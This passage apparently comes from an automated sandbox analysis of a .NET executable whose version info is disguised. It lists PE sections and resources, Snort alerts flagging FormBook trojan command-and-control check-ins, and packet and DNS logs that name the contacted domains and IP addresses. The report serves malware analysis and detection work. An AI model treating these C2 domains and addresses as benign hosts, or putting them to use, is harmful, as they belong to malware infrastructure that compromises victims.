                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb3cc40x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x28024.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb1d1c0xb1e00False0.953868916901data7.94799509268IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb40000x280240x28200False0.347449376947data5.34674727144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xde0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xb42800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0xc4aa80x94a8data
                                                                  RT_ICON0xcdf500x5488data
                                                                  RT_ICON0xd33d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0xd76000x25a8data
                                                                  RT_ICON0xd9ba80x10a8data
                                                                  RT_ICON0xdac500x988data
                                                                  RT_ICON0xdb5d80x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0xdba400x76data
                                                                  RT_VERSION0xdbab80x37edata
                                                                  RT_MANIFEST0xdbe380x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2012
                                                                  Assembly Version8.1.1.15
                                                                  InternalNameSyncSortedList.exe
                                                                  FileVersion8.1.1.14
                                                                  CompanyNameLandskip Yard Care
                                                                  LegalTrademarksA++
                                                                  Comments
                                                                  ProductNameLevelActivator
                                                                  ProductVersion8.1.1.14
                                                                  FileDescriptionLevelActivator
                                                                  OriginalFilenameSyncSortedList.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/12/21-10:03:55.992832TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:03:55.992832TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:03:55.992832TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.7104.21.7.67
                                                                  04/12/21-10:04:06.577115TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:06.577115TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:06.577115TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.73.13.255.157
                                                                  04/12/21-10:04:45.313567TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16
                                                                  04/12/21-10:04:45.313567TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16
                                                                  04/12/21-10:04:45.313567TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.752.58.78.16

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 12, 2021 10:03:23.034774065 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.075706959 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.075937986 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.076253891 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.117088079 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117110968 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117119074 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:23.117327929 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.117460012 CEST4970580192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:03:23.158083916 CEST8049705192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:03:44.995295048 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.297630072 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.297919989 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.298271894 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.600028038 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601017952 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601061106 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601099968 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601140976 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601155996 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601180077 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601210117 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601217985 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601258039 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601300955 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601301908 CEST804971115.165.26.252192.168.2.7
                                                                  Apr 12, 2021 10:03:45.601350069 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:45.601362944 CEST4971180192.168.2.715.165.26.252
                                                                  Apr 12, 2021 10:03:50.707400084 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.757863998 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.757976055 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.758109093 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.808378935 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822356939 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822392941 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:50.822529078 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.822621107 CEST4971880192.168.2.781.17.18.198
                                                                  Apr 12, 2021 10:03:50.873472929 CEST804971881.17.18.198192.168.2.7
                                                                  Apr 12, 2021 10:03:55.941447020 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:55.992517948 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:55.992671967 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:55.992831945 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.045136929 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.058897972 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.058953047 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:03:56.059065104 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.059170008 CEST4971980192.168.2.7104.21.7.67
                                                                  Apr 12, 2021 10:03:56.110069990 CEST8049719104.21.7.67192.168.2.7
                                                                  Apr 12, 2021 10:04:01.148515940 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.200898886 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.201147079 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.201181889 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.253643990 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253669024 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253680944 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:01.253880978 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.253906012 CEST4972080192.168.2.752.56.126.26
                                                                  Apr 12, 2021 10:04:01.306417942 CEST804972052.56.126.26192.168.2.7
                                                                  Apr 12, 2021 10:04:06.439419031 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.576766968 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.576963902 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.577115059 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.714370012 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714777946 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714795113 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:06.714907885 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.715009928 CEST4972180192.168.2.73.13.255.157
                                                                  Apr 12, 2021 10:04:06.852257967 CEST80497213.13.255.157192.168.2.7
                                                                  Apr 12, 2021 10:04:17.127279997 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.253741980 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.253856897 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.254053116 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.381551027 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381587029 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381611109 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381784916 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.381843090 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.508168936 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:22.617058992 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.809813976 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:22.809901953 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.810084105 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.060673952 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:23.319248915 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.560704947 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:28.448050022 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499239922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.499409914 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499571085 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.550677061 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859160900 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859213114 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859246016 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859287024 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859333038 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859376907 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859422922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859467983 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859505892 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859538078 CEST8049736172.67.130.43192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 12, 2021 10:02:20.495014906 CEST6245253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:20.560719013 CEST53624528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:20.586713076 CEST5782053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:20.635438919 CEST53578208.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:30.757080078 CEST5084853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:30.821048021 CEST53508488.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:42.614327908 CEST6124253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:42.679126024 CEST53612428.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:47.830168009 CEST5856253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:47.887202978 CEST53585628.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:50.157366991 CEST5659053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:50.225857973 CEST53565908.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:06.816339016 CEST6050153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:06.865113974 CEST53605018.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:07.356026888 CEST5377553192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:07.405900955 CEST53537758.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:08.604291916 CEST5183753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:08.659311056 CEST53518378.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:11.278681040 CEST5541153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:11.337115049 CEST53554118.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:15.726967096 CEST6366853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:15.775674105 CEST53636688.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:21.432589054 CEST5464053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:21.494884014 CEST53546408.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:22.569964886 CEST5873953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:22.632436037 CEST53587398.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:22.870313883 CEST6033853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:23.026472092 CEST53603388.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:24.307562113 CEST5871753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:24.359051943 CEST53587178.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:33.147968054 CEST5976253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:33.315085888 CEST53597628.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:38.910700083 CEST5432953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:39.600145102 CEST53543298.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:43.517762899 CEST5805253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:43.567584038 CEST53580528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:44.616936922 CEST5400853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:44.994215012 CEST53540088.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:49.180460930 CEST5945153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:49.229583025 CEST53594518.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:50.432384014 CEST5291453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:50.498863935 CEST53529148.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:50.618171930 CEST6456953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:50.706372976 CEST53645698.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:55.866353035 CEST5281653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:55.940130949 CEST53528168.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:01.071098089 CEST5078153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:01.145728111 CEST53507818.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:06.259737015 CEST5423053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:06.437951088 CEST53542308.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:10.239384890 CEST5491153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:10.315071106 CEST53549118.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:10.905457020 CEST4995853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:10.985584974 CEST53499588.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.602550983 CEST5086053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:11.610517979 CEST5045253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:11.659197092 CEST53504528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.664302111 CEST53508608.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.758018017 CEST5973053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.050801039 CEST53597308.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:12.100214958 CEST5931053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.157545090 CEST53593108.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:12.731231928 CEST5191953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.841996908 CEST53519198.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:13.643189907 CEST6429653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:13.700999975 CEST53642968.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:14.505546093 CEST5668053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:14.567795038 CEST53566808.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:15.561683893 CEST5882053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:15.628526926 CEST53588208.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:16.149455070 CEST6098353192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:16.202244997 CEST53609838.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:16.502510071 CEST4924753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:16.564606905 CEST53492478.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:17.016347885 CEST5228653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:17.059242010 CEST5606453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:17.078577042 CEST53522868.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:17.126185894 CEST53560648.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:22.400674105 CEST6374453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:22.615638018 CEST53637448.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:28.382811069 CEST6145753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:28.445403099 CEST53614578.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:33.483331919 CEST5836753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:33.531981945 CEST53583678.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:33.868014097 CEST6059953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:33.948719978 CEST53605998.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:39.572663069 CEST5957153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:39.647254944 CEST53595718.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:45.185347080 CEST5268953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:45.270700932 CEST53526898.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:52.523541927 CEST5029053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:52.573712111 CEST53502908.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:05:00.748820066 CEST6042753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:05:00.800390005 CEST53604278.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:05:06.053375006 CEST5620953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:05:06.754046917 CEST53562098.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 12, 2021 10:03:22.870313883 CEST192.168.2.78.8.8.80x24efStandard query (0)www.emmajanetracy.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:33.147968054 CEST192.168.2.78.8.8.80x2947Standard query (0)www.omxpro.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:38.910700083 CEST192.168.2.78.8.8.80xfd95Standard query (0)www.rosewoodcibubur.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:44.616936922 CEST192.168.2.78.8.8.80x7eb2Standard query (0)www.okitmall.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:50.618171930 CEST192.168.2.78.8.8.80x3d59Standard query (0)www.moretuantired.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.866353035 CEST192.168.2.78.8.8.80x12acStandard query (0)www.betbonusuk.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:01.071098089 CEST192.168.2.78.8.8.80x566eStandard query (0)www.weluvweb.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.259737015 CEST192.168.2.78.8.8.80xb55eStandard query (0)www.warungjitu.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:11.758018017 CEST192.168.2.78.8.8.80xe2a2Standard query (0)www.peridot.websiteA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.059242010 CEST192.168.2.78.8.8.80x1742Standard query (0)www.appearwood.clubA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:22.400674105 CEST192.168.2.78.8.8.80x66c6Standard query (0)www.theartsutra.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.382811069 CEST192.168.2.78.8.8.80xfaf3Standard query (0)www.chestfreezersale.xyzA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.868014097 CEST192.168.2.78.8.8.80xd76dStandard query (0)www.loktantratvnews.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.572663069 CEST192.168.2.78.8.8.80xe518Standard query (0)www.getboostphlo.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:45.185347080 CEST192.168.2.78.8.8.80x953fStandard query (0)www.ux300e.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:05:06.053375006 CEST192.168.2.78.8.8.80x3379Standard query (0)www.rosewoodcibubur.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)www.emmajanetracy.comemmajanetracy.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)emmajanetracy.com192.0.78.25A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)emmajanetracy.com192.0.78.24A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:33.315085888 CEST8.8.8.8192.168.2.70x2947No error (0)www.omxpro.comwww.omxpro.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:03:39.600145102 CEST8.8.8.8192.168.2.70xfd95Server failure (2)www.rosewoodcibubur.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:44.994215012 CEST8.8.8.8192.168.2.70x7eb2No error (0)www.okitmall.com15.165.26.252A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:50.706372976 CEST8.8.8.8192.168.2.70x3d59No error (0)www.moretuantired.com81.17.18.198A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.940130949 CEST8.8.8.8192.168.2.70x12acNo error (0)www.betbonusuk.com104.21.7.67A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.940130949 CEST8.8.8.8192.168.2.70x12acNo error (0)www.betbonusuk.com172.67.187.138A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:01.145728111 CEST8.8.8.8192.168.2.70x566eNo error (0)www.weluvweb.com52.56.126.26A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)www.warungjitu.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:12.050801039 CEST8.8.8.8192.168.2.70xe2a2Name error (3)www.peridot.websitenonenoneA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)www.appearwood.clubhotlightexpens.funCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun52.206.71.220A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun34.196.151.230A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun52.86.219.129A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun54.144.3.29A (IP address)IN (0x0001)
